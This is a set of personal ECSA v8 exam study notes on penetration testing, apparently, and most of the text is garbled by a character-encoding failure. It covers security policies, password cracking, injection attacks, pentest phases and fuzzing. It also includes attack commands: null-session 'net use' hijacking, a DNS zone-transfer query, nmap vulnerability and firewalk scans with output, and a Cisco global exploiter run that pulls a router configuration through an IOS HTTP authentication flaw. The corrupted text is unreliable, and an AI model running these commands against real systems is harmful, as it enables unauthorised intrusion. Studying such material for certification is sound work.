Rough hints v8ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj ECSA v8 Key learning’s/ Take away for Exam By : Manju evaraj a!a leaks "# "oge Em#$oyee % &nsider Attacker More !$an %&' of Bu(ge! ''( is )on &*+Secrity Core )o*us in +T se*uri!y '( AAA % C&A % )on "e#diation . ,isk - loss . ex/osure fa*!or +0E s*an " 1a*ke! sen! !o 2om3ie Com/u!er 4/en /or! ' #acket ,it- .&! /0122 3res#onse ,i$$ 4e /0120 . Me!amor/$i* 5irus' code re,rites % signatre c-anges 34t 5nctiona$ity stays same . 1oli*ies " .romiscos .o$icy 3 .ermissive .o$icy 3 .rdent3 .aranoid #o$icy 1ru(en! Se*uri!y 1oli*y 6 .rovides max secrity 3 a$$ sevices are 4$ocked 3 not-ing is a$$o,ed 3 everyt-ing is $ogged . 1ermissive Se*uri!y /oli*y 6 .o$icy 4egins 7ide 8#en3 kno,n dangers % attacks are 4$ocked 3 im#ossi4$e to kee# # ,it- crrent ex#$oits . .ort no’s a4ove 0291 3 registered for vendor s#ecific a##$ications . :nti$ 0291 are 7e$$ kno,n #orts . .ositive ackno,$edgment ,it- retransmission garantees re$ia4$e de$ivery of data . 7indo,ing 6 &m#rove f$o, Contro$ % re$ia4i$ity TC1 $ea(er fiel(s6 &!S 3 )&!S 3 &. 5ragmentation ;.to 4e #re#ared !os Syn 5$ooding takes advantage of f$a, in -osts im#$ement / ,ay -ands-akes. +S evasion Te*$ni7ues are modifications made to attack in order to #revent detection 4y an &!S. 8+Ss moni!ors % eva$ate ser % system activities3 identify kno,n attacks3 determine a4norma$ activity 3 determine a4norma$ net,ork activity 3 #o$icy vio$ation over 7LA) 3 S#oofing % M&*M attack . 1asswor( *ra*king a!!a*ks Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj • i*!ionary 6 !ictionary d4 $oaded • Bru!efor*e 6 tries every com4ination. • 9y3ri( 6 ,orks $ike dictionary 4t adds some no’s % sym4o$s to ,ords in dictionary. • Sylla3le 6 Com4ination of <rte force % dictionary • ,ule 3ase( 6 sed ,-en attacker gets some info a4ot #ass,ord. :::::::::::::::::::::::::::: 1asswor(s are -as-ed % stored in SAM $ocated in ,indo,s=systems/9=config=SAM Linx +etc+#ass,d or +etc+s-ado, ,ain3ow !a3les contains #re'com#ted -as-es of .ass,ords . .recom#i$ed -as- ta4$e . So*ial Engineering Ty/es • Vis-ing 6 Scamming sers to srrender #rivate info sing te$e#-one $ines. • !m#ster diving 6 Searc-ing info in dis#osa$ areas sti$$ yet to 4e destroyed . • S-o$der Srfing 6Looking over s-o$der to gain+gat-er info. • .-is-ing 6 :sing fake ,e4sites to redirect3 emai$s contains ss#icios attac-ments. • Accom#$ice 6 met-od is associated ,it- 4ri4ing 3 -anding ot gifts 3 #ersona$$y invo$ving to 4ecome a friend . • &dentity *-eft 6 Stea$ing yor name or #ersona$ info for frad$ent #r#ose 8e3 ;<= #rovides more attack srface for ,e4 ex#$oitation 3 S>L injection is t-e 4iggest t-reat to ,e4 9.2 8e3 s/i(ering too$s $ike <r# Site sed to mirror a target ,e4site. 8e3 1arame!er !am/ering a!!a*k invo$ves mani#$ation of #arameters exc-anged 4et,een c$ient % server in order to modify a##$ication data sc- as ser credentia$ % #ermissions3 #rice % ?antity of #rodcts. <est ,ay to #rotect ,e4 a##$ications from t-is is to a##$y effective in#t fie$d fi$tering S>0 inje*!ion 6 takes advantage of non'va$idated in#t v$nera4i$ities to #ass S>L commands t-rog- a Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj ,e4 a##$ication. 0A1 inje*!ion a!!a*ks are simi$ar to S>L injection attack 4t ex#$oit ser #arameter to generate L!A. ?ery . &n S4A1 inje*!ion a!!a*k3 attacker injects ma$icios ?ery strings into t-e ser fi$ed to 4y#ass Service at-entication mec-anisms % access 4ackend d4 . )un*!ional Tes!ing falls ,it-in t-e sco#e of 4$ack 4ox testing@ % it’s no, re?ired to -ave t-e kno,$edge of inner design of t-e code or $ogic. S>0 inje*!ion 5ulnera3ili!ies: • !etect S>L injection isses • !etect in#t SanitiAation • !etect *rncation isses • !etect S>L modification isses C$allenges !o +T Se*uri!y < • Environment com#$exity ' &nsecre )et,ork !esign 3 M$tivendor Environment • )e, *ec-no$ogies ' *nne$ to <y#ass access Contro$s . • )e, *-reats % Ex#$oits ' Avg every 1 -ors ne, t-reats are discovered . • Limited focs on Secrity . • Limited secrity ex#ertise . • Environmenta$ Com#$exity firewalk *ries to discover fire,a$$ r$es sing an &. **L ex#iration tec-ni?e kno,n as fire,a$king. nma# ''scri#tBfire,a$k ''tracerote C1.D1.12./.9 nma# ''scri#tBfire,a$k ''tracerote ''scri#t'argsBfire,a$k.max'retriesB0 E-ost( nma# ''scri#tBfire,a$k ''tracerote ''scri#t'argsBfire,a$k.#ro4e'timeotB122ms E-ost( 8$ile (oing 1en Tes! Create a $og of a$$ actions 3 res$ts % 5indings. Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj $!!//?<? error /age msg *o(e @=% ' ( .roxy At- re?ired +CM1 • *y#e / Code / '( !est #ort nreac-a4$e • *y#e / Code 9 '( !est #rotoco$ nreac-a4$e • *y#e / code 0/ '( adminstrative$y 4$ocked • *y#e 2 Code 2 ' ec-o re#$y • *y#e 2 code 8 ' Ec-o "e?est Co(es: 2 )et :nreac-a4$e 0 Host :nreac-a4$e 9 .rotoco$ :nreac-a4$e / .ort :nreac-a4$e 1 5ragmentation )eeded and !onFt 5ragment ,as Set D Sorce "ote 5ai$ed C !estination )et,ork :nkno,n G !estination Host :nkno,n 1en!es! is active$y eva$ating t-e secrity of an information system or net,ork 4y sim$ating an attack . Hoes one ste# frt-er t-en v$nera4i$ity testing .Ada#ts inde#t et-ica$ -acking . Blue Team ' *est ran ,it- t-e kno,$edge of orgFs &* staff . ,e( Team ' .entest ran 7it-ot kno,$edge of Iinforming t-eJ &* staff 3 4t ,it- conscent of :##er Mgmt . 1en Tes!ing Ty/es Bla*k 3ox ' <$ind testing % do4e 4$ind ' no kno,$dg of infra. 4efore . w$i!e Box ' Annonced % nannonced ' Has com#$eted kno,$dg of infra. Arey Box ' Com4ination of <$ack 4ox % nannonced testing ' Limited kno,$. 1en Tes! 1$ases Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj • .re'attack .-ase ' .assive "econnaissance % Active reconn • Attack .-ase ' .erimiter 3 7e4 A##$ication % 7ire$ess *esting ..etc • .ost attack #-ase '"emoving a$$ fi$es % c$eaning registry Be!work Se*uri!y Assessmen! A*!ivi!y in A!!a*k /$ase " ( &dentifies V$nera4i$ities % -e$#s to im#rove Enter#rise Secrity .o$icy . A//li*a!ion Se*uri!y Assessmen! '( Sorce code "evie, 3 At-oriAation *esting 3 5nctiona$ity *esting 3 7e4 #enetration *esting . 0egal Agreemen! ' ( Sco#e of #roject % Consent of Com#any . ,ule of Engagemen!/3e$avior "# re?ires Signatre from 4ot- .en tester % t-e Com#any . 1en Tes! 1ri*ing ,e/or! '( )o. of C$ient Com#ter+&.Fs to 4e *ested % "esorce "e?ired 3 *ime to 5inis- t-e #roject . Tiger Team '( A Hro# of .eo#$e -ired to give detai$s of t-e V$nera4i$ities #resent in t-e system . 1assive info ga!$ering ' (5rom .4$ic Sorces EgK :sing )etcraft A*!ive info Aa!$ '( Socia$ engineering 3 on'site visits 3 face 'to face intervie,s % *oo$s . Eg K :sing )esss I makes too mc- noise J . Bessus ' Scri#ting $angage is )ASL ,-ic- can 4e sed to create Cstom Scri#ts . 5i$ety#eK##t '( finds ##ts on Hoog$e Aramm"0ea*$"Bliley A*! ' ( #rotect consmers #ersona$ financia$ information -e$d 4y financia$ instittions and t-eir service #roviders . )amily E(u*a!ional ,ig$!s an( 1riva*y A*! C)E,1AJ for Stdents. A*!ive +S " &!S cts off yor connection 3,-en rnning a v$nera4i$ity scan on a net,ork . Aoogle Sear*$ $a*krou!er<*om "# ,i$$ #rodce a$$ sites t-at $inks to t-e $a*krou!er<*om . DMAS s*an most of t-e #orts scanned do no! give a res/onse ' .orsts are in 4/en s!a!e . BS 2one !ransfer comes in t,o f$avors3 f$$ Io#code AL5"J and incrementa$ I&L5"J. #(ig exam/le<*om axfr 7-en a !)S Aone transfer is a$$o,ed3 yo s-o$d get a com#$ete $isting of a$$ !)S entries t-at -ave 4een made in t-e !)S server for t-is domain. &f t-e !)S server doesnFt a$$o, it3 yo ,i$$ get an error indicating t-at t-e Mone transfer didnFt ,ork. Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj Sour*e E es!ina!ion /or! in *C. -eader 0C 4its ' ( 9N0C B CDD/C A*k no</Se7uen*e Bo. '( /9 <it 8inx/ ,e/air ,isk '(.ressing S-iftO502 gives t-e ser administrative rig-ts. Bull Session $ija*king (net se ==02.02.9.99D=i#cP QQ Q+serKQ (net se H$ean information ' it- a n$$ session connection3 yo can no, se ot-er ti$ities to gat-er critica$ 7indo,s information remote$y. !oAens of too$s can gat-er t-is ty#e of information. net vie, ==02.02.9.99D 8info an( um/Se* can gat-er sef$ information a4ot sers and configrations3 sc- as • 7indo,s domain to ,-ic- t-e system 4e$ongs • Secrity #o$icy settings • Loca$ sernames • !rive s-ares Coun!ermeasures agains! null session $a*ks <$ock )et<&8S on yor 7indo,s server 4y #reventing t-ese *C. #orts from #assing t-rog- yor net,ork fire,a$$ or #ersona$ fire,a$$K • 0/R I)et<&8S sessions servicesJ • !isa4$e 5i$e and .rinter S-aring for Microsoft )et,orks in t-e .ro#erties ta4 of t-e mac-ineFs • "estrict anonymos connections to t-e system. HSETUL8CALUMACH&)E=STS*EM=CrrentContro$Set=Contro$=LSA="estrictAnonymos to a !78"! va$e as fo$$o,sK Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj • )oneK *-is is t-e defa$t setting. • "e$y on !efa$t .ermissions ISetting 2JK *-is setting a$$o,s t-e defa$t n$$ session connections. • !o )ot A$$o, Enmeration of SAM Acconts and S-ares ISetting 0JK *-is is t-e medim secrity $eve$ setting. *-is setting sti$$ a$$o,s n$$ sessions to 4e ma##ed to &.CP3 ena4$ing sc- too$s as 7a$ksam to garner information from t-e system. • )o Access ,it-ot Ex#$icit Anonymos .ermissions ISetting 9JK *-is -ig- secrity setting #revents n$$ session connections and system enmeration. Bma/ 5ulnera3ili!y s*anning nma# 'sV ''scri#tBv$scan ,,,.exam#$e.com Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj @ec-o Cortesy manj !evaraj cd CK=.rogram 5i$es=)ma# *m( /* nma/ "1B "T@ "/?FG6@@& "n "v ""s*ri/!-sm3"*$e*k"vulns ""s*ri/!"args safe-? ?=<?8H<;%<?";&@ # *:I!em/I?=<?8H<;%<=<!x! nma/ "i0 *:I!em/Ii/s<!x! "sn "1S )ma# scan re#ort for #-sv'rdsc49.g-m-.org I02.08C.9G.9J Host is # I2.22s $atencyJ. MAC AddressK 22KD2KDCKADK0CK5D IVM,areJ )ma# scan re#ort for 02.08C.9G.D Host is # I2.22s $atencyJ. MAC AddressK 22KD2KDCKADKDCK51 IVM,areJ )ma# scan re#ort for #-sv'#rint0.g-m-.org I02.08C.9G.GJ Host is # I2.22s $atencyJ. MAC AddressK 22KD2KDCKADKGDKDG IVM,areJ Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj )ma# doneK R &. addresses I/ -osts #J scanned in /.9D seconds JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ 94ST +SC45E,K: '.8V#rotoco$ $istWK &. .rotoco$ .ing '.nK *reat a$$ -osts as on$ine '' ski# -ost discovery XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX nma/ "i0 *:I!em/Ii/s<!x! "sn "1= Starting )ma# C.12 I -tt#K++nma#.org J at 920/'00'0/ 2DK1C Eastern Standard )ma# scan re#ort for 02.08C.9G.0 Host is #. )ma# scan re#ort for #-sv'rdsc49.g-m-.org I02.08C.9G.9J Host is #. )ma# scan re#ort for 02.08C.9G./ Host is #. )ma# scan re#ort for 02.08C.9G.1 Host is #. )ma# scan re#ort for 02.08C.9G.D Host is #. )ma# scan re#ort for 02.08C.9G.C Host is #. )ma# scan re#ort for #-sv'#rint0.g-m-.org I02.08C.9G.GJ Host is #. )ma# scan re#ort for 02.08C.9G.8 Host is #. )ma# scan re#ort for 02.08C.9G.R Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj Host is #. )ma# doneK R &. addresses IR -osts #J scanned in 2.9G seconds nma/ "i0 *:I!em/Ii/s<!x! "1= "sL "/?FG6@@&6?FG68= "v C:I1rogram )ilesIBma/#nma/ "i0 *:I!em/Ii/s<!x! "1= "sL "/?"&== Starting )ma# C.12 I -tt#K++nma#.org J at 920/'00'0/ 2DKDG Eastern Standard *ime )ma# scan re#ort for #-sv'rdsc49.g-m-.org I02.08C.9G.9J Host is # I2.22s $atencyJ. )ot s-o,nK 1RD c$osed #orts .8"* S*A*E SE"V&CE 09/+d# o#enYfi$tered nt# 0/G+d# o#en net4ios'ns 0/8+d# o#enYfi$tered net4ios'dgm 0C0+d# o#enYfi$tered snm# D22+d# o#enYfi$tered isakm# MAC AddressK 22KD2KDCKADK0CK5D IVM,areJ )ma# scan re#ort for 02.08C.9G.D Host is # I2.22s $atencyJ. )ot s-o,nK 1R/ c$osed #orts .8"* S*A*E SE"V&CE 09/+d# o#enYfi$tered nt# 0/G+d# o#en net4ios'ns 0/8+d# o#enYfi$tered net4ios'dgm 0C0+d# o#enYfi$tered snm# 0C9+d# o#enYfi$tered snm#tra# Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj 11D+d# o#enYfi$tered microsoft'ds D22+d# o#enYfi$tered isakm# MAC AddressK 22KD2KDCKADKDCK51 IVM,areJ )ma# scan re#ort for #-sv'#rint0.g-m-.org I02.08C.9G.GJ Host is # I2.22s $atencyJ. )ot s-o,nK 1RD c$osed #orts .8"* S*A*E SE"V&CE 09/+d# o#enYfi$tered nt# 0/G+d# o#en net4ios'ns 0/8+d# o#enYfi$tered net4ios'dgm 0C0+d# o#enYfi$tered snm# D22+d# o#enYfi$tered isakm# MAC AddressK 22KD2KDCKADKGDKDG IVM,areJ )ma# doneK R &. addresses I/ -osts #J scanned in /2R.C1 seconds nma/ "v "sn ?G;<?H8<=<=/?H ?=<=<=<=/8 nma/ "v "i, ?==== "1n "/ 8= M i, " # ran(om Targe!s nma/ "i0 *:I!em/Ii/s<!x! "1= "sL "/?"?=;@ "vv "s5 "4 Z :!. scan ' #ort range 3 do4$e ver4ose 3 SV ' #ro4e to determine version of service 3 version of 8S Dmas s*an C"sDN Sets t-e 5&)3 .SH3 and :"H f$ags3 $ig-ting t-e #acket # $ike a C-ristmas tree. *-ese t-ree scan ty#es are exact$y t-e same in 4e-avior exce#t for t-e *C. f$ags set in #ro4e #ackets. &f a "S* #acket is received3 t-e #ort is considered c$osed3 ,-i$e no res#onse means it is o#enYfi$tered. *-e #ort is marked fi$tered if an &CM. nreac-a4$e error Ity#e /3 code 03 93 /3 R3 023 or 0/J is received. C:I1rogram )ilesIBma/#nma/ "s, ?=<?8H<;%<?; "1= "sT "/?"?=;@ "vv "s5 "4 Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj 7A")&)HK 's" is no, an a$ias for 'sV and activates version detection as ,e$$ as ".C scan. Starting )ma# C.12 I -tt#K++nma#.org J at 920/'00'0/ 2CK/0 Eastern Standard *ime )SEK Loaded 9/ scri#ts for scanning. &nitiating A". .ing Scan at 2CK/0 Scanning 02.08C.9G.09 V0 #ortW Com#$eted A". .ing Scan at 2CK/03 2.2Cs e$a#sed I0 tota$ -ostsJ &nitiating .ara$$e$ !)S reso$tion of 0 -ost. at 2CK/0 Com#$eted .ara$$e$ !)S reso$tion of 0 -ost. at 2CK/03 2.22s e$a#sed &nitiating Connect Scan at 2CK/0 Scanning 02.08C.9G.09 V0291 #ortsW !iscovered o#en #ort 0/D+tc# on 02.08C.9G.09 !iscovered o#en #ort 11D+tc# on 02.08C.9G.09 !iscovered o#en #ort 0/R+tc# on 02.08C.9G.09 Com#$eted Connect Scan at 2CK/93 1D.R0s e$a#sed I0291 tota$ #ortsJ &nitiating Service scan at 2CK/9 Scanning / services on 02.08C.9G.09 Com#$eted Service scan at 2CK/93 C.2/s e$a#sed I/ services on 0 -ostJ &nitiating 8S detection Itry X0J against 02.08C.9G.09 )SEK Scri#t scanning 02.08C.9G.09. )SEK Starting rn$eve$ 0 Iof 0J scan. )ma# scan re#ort for 02.08C.9G.09 Host is # I2.22s $atencyJ. Scanned at 920/'00'0/ 2CK/0KDR Eastern Standard *ime for D/s )ot s-o,nK 0290 fi$tered #orts Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj .8"* S*A*E SE"V&CE VE"S&8) 0/D+tc# o#en msr#c Microsoft 7indo,s ".C 0/R+tc# o#en net4ios'ssn 11D+tc# o#en net4ios'ssn MAC AddressK 22KD2KDCKADKGDK/A IVM,areJ 7arningK 8SScan res$ts may 4e nre$ia4$e 4ecase ,e co$d not find at $east 0 o #en and 0 c$osed #ort !evice ty#eK genera$ #r#ose "nningK Microsoft 7indo,s GY9228 8S C.EK c#eK+oKmicrosoftK,indo,sUGKK' c#eK+oKmicrosoftK,indo,sUGKKs#0 c#eK+oKmic rosoftK,indo,sUserverU9228KKs#0 c#eK+oKmicrosoftK,indo,sU8 8S detai$sK Microsoft 7indo,s G S.2 ' S.03 7indo,s Server 9228 S.03 or 7indo,s 8 *C.+&. finger#rintK 8SKSCA)IVBC.12[EB1[!B00+0/[8*B0/D[C*B[C:B/119C[.VBT[!SB0[!CB![HB)[MB22D2DC[ 8SK*MBD98/C/C1[.BiC8C'#c',indo,s',indo,sJSE>IS.B029[HC!B0[&S"B02A[*&B&[C&B& 8SK[&&B&[SSBS[*SBGJ8.SI80BMD<1)78S*00[89BMD<1)78S*00[8/BMD<1)78))*00[81BMD< 8SK1)78S*00[8DBMD<1)78S*00[8CBMD<1S*00J7&)I70B9222[79B9222[7/B9222[71B9222[ 8SK7DB9222[7CB9222JEC)I"BT[!5BT[*B82[7B9222[8BMD<1)78))S[CCB)[>BJ*0I"BT[!5B 8SKT[*B82[SB8[ABSO[5BAS["!B2[>BJ*9I"BT[!5BT[*B82[7B2[SBM[ABS[5BA"[8B["!B2[> 8SKBJ*/I"BT[!5BT[*B82[7B2[SBM[AB8[5BA"[8B["!B2[>BJ*1I"BT[!5BT[*B82[7B2[SBA[ 8SKAB8[5B"[8B["!B2[>BJ*DI"BT[!5BT[*B82[7B2[SBM[ABSO[5BA"[8B["!B2[>BJ*CI"BT[ 8SK!5BT[*B82[7B2[SBA[AB8[5B"[8B["!B2[>BJ*GI"BT[!5BT[*B82[7B2[SBM[ABSO[5BA"[ 8SK8B["!B2[>BJ:0I"BT[!5B)[*B82[&.LB0C1[:)B2["&.LBH["&!BH["&.CSBH[":CSBH[":! 8SKBHJ&EI"BT[!5&B)[*B82[C!BMJ :#time gessK G./CC days Isince *e )ov 2D 90K1DK/G 920/J Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj )et,ork !istanceK 0 -o# *C. Se?ence .redictionK !iffic$tyB9D8 IHood $ckZJ &. &! Se?ence HenerationK &ncrementa$ Service &nfoK 8SK 7indo,s@ C.EK c#eK+oKmicrosoftK,indo,s "ead data fi$es fromK CK=.rogram 5i$es=)ma# 8S and Service detection #erformed. .$ease re#ort any incorrect res$ts at -tt#K ++nma#.org+s4mit+ . )ma# doneK 0 &. address I0 -ost #J scanned in DC.1C seconds "a, #ackets sentK 0G I0.11CS<J Y "cvdK 0G I0./D8S<J CK=.rogram 5i$es=)ma#( )orm S*al/el sed for !issecting H*ML 5orms 3 too$ can extract a$$ H*ML forms from #ages . Ba*kTra*k !o ex/loi! Cis*o +4S vlunera3ili!y root@sk$$K+#entest+cisco+cisco'g$o4a$'ex#$oiterX .+cge.#$ :sage K #er$ cge.#$ Etarget( Ev$nera4i$ity nm4er( V$nera4i$ities $ist K V0W ' Cisco CGG+CG8 *e$net <ffer 8verf$o, V$nera4i$ity V9W ' Cisco &8S "oter !enia$ of Service V$nera4i$ity V/W ' Cisco &8S H**. At- V$nera4i$ity V1W ' Cisco &8S H**. Configration Ar4itrary Administrative Access V$nera4i$ity VDW ' Cisco Cata$yst SSH .rotoco$ Mismatc- !enia$ of Service V$nera4i$ity VCW ' Cisco CGD 7e4 Administration !enia$ of Service V$nera4i$ity VGW ' Cisco Cata$yst /D22 LL "emote Ar4itrary Command V$nera4i$ity V8W ' Cisco &8S Soft,are H**. "e?est !enia$ of Service V$nera4i$ity Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj VRW ' Cisco D01 :!. 5$ood !enia$ of Service V$nera4i$ity V02W ' CiscoSecre ACS for 7indo,s )* Server !enia$ of Service V$nera4i$ity V00W ' Cisco Cata$yst Memory Leak V$nera4i$ity V09W ' Cisco Cat8S CiscoVie, H**. Server <ffer 8verf$o, V$nera4i$ity V0/W ' 2 Encoding &!S <y#ass V$nera4i$ity I:*5J V01W ' Cisco &8S H**. !enia$ of Service V$nera4i$ity roo!Oskull://en!es!/*is*o/*is*o"glo3al"ex/loi!erJ </*ge</l .=<;.<.@<? F V$nera4i$ity sccessf$ ex#$oited ,it- V-tt#K++\2.9\.\1.0+$eve$+0G+exec+....W ... +$eve$+P):M<E"+exec+s-o,+config+cr ,-ere P):M<E" is an integer 4et,een 0C and RR. roo!Oskull://en!es!/*is*o/*is*o"glo3al"ex/loi!erJ firefox -tt#K++\2.9\.\1.0+$eve$+0G+exec+.... -tt#K++02.02.2.90+$eve$+RR+exec+s-o,+config C$ick cance$ to t-e $ogon 4ox and enter t-e fo$$o,ing addressK ErrorM 9y/erlink referen*e no! vali(< +nforma!ion !e*$nology risk "isk B *-reat ] V$nera4i$ity ] Asset Va$e Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj )uPPing A!!a*k " +nje*!ion Te*$ni7ue A fAAer is a #rogram ,-ic- injects atomatica$$y semi'random data into a #rogram+stack and detect 4gs. *-e 5AAing Scan does jst as descri4ed a4ove@ it generates tota$$y random in#t for t-e s#ecified re?est #arameters for a s#ecified nm4er of re?ests3 -o#ing to #rovoke some kind of nex#ected . <y defa$t t-e generated va$es ,i$$ 4e 4et,een D and 0D c-aracters in $eng-t and mtated 022 times@ Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj &n#tting Massive Amont of !ata to Cras- t-e 7e4 A##$ication . • um3 )uPP Tes!ing • Smar! )uPP Tes!ing ' Sno,ing nder$ying strctre of data4ase s##$y -ge in#ts accoording$y . Rough hints v8 Rough hints v8 ECSA V8 key Learning’s Hints for Exam
[email protected] Hints Manj !evaraj Anonymiser ' can 4e sed to get arond t-e <$ocked access +nforma!ion 5ulnera3ili!y ' ^o4 .ostingFs ot-er #ostings ex#osing t-e information a4ot t-e *ec-no$ogy . Citrix ServerFs .ort ' 9DR8 is sed to scan a net,ork to find t-e Citrix mac-ines . S!a*$el(ra$! *-e origina$ !!8S too$ QStac-e$dra-tQ ' a Herman ,ord means F<ar4ed ,iresF ' is re$eased dring t-e midd$e of 0RRR. *-e Stac-e$dra-t ,orks on most So$aris and Linx system. *-e origina$ Stac-e$dra-t3 ,ritten 4y -acker FrandomiAerF3 ,as fond to 4e rnning on most of t-e So$aris #$atform 4ecase t-e Linx version is ?ite 4roken. Stac-e$dra-t 4y itse$f is a ma$icios #rogram t-at covers its track ,it-in a com#romised system and commnicates 4y covert c-anne$ and encry#tion on t-e net,ork. *-e attacker co$d contro$ -ndreds or t-osands of com#romised system via a sing$e command $ine interface and $anc- different ty#es of 4S attack to victim after,ard. &t com4ines t-e featres avai$a4$e from *rinoo3 *5) and adds some ne, !!8S attacks. -tt#K++#acketstormsecrity.com+distri4ted Common V$nera4i$ities and Ex#osres ICVE_J ' S4mit t-e &!S Logs for any ne, v$nera4i$ity . Sof!ware )irewalls o#erate at !LL . Rough hints v8